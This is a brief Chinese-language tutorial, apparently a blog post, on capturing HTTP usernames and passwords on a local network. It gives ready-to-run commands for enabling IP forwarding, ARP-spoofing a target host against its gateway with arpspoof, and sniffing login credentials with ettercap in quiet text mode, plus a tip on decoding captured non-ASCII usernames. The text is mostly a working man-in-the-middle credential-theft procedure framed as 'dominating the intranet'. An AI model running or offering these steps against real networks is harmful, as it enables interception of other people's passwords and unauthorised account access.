内网称霸之《HTTP账号密码获取》

使用工具:arpspoof、ettercap
ettercap是什么?

我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。
而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。

一、ARP欺骗

1
2
3
echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 目标IP 目标主机网关

二、使用ettercap获取HTTP账号和密码

另开一个终端,输入ettercap -Tq -i eth0

1
ettercap -Tq -i eth0

-T:文本模式
q:安静模式
i:指定网卡
成功后当靶机浏览HTTP网页试用账号和密码登陆时,这个终端窗口就会显示相应的url、账号、密码。
💛💙❤注意:当对方的用户名是使用中文登陆的,则终端窗口账号处显示的是编码,则需要使用到url解码,将这串编码解码成中文。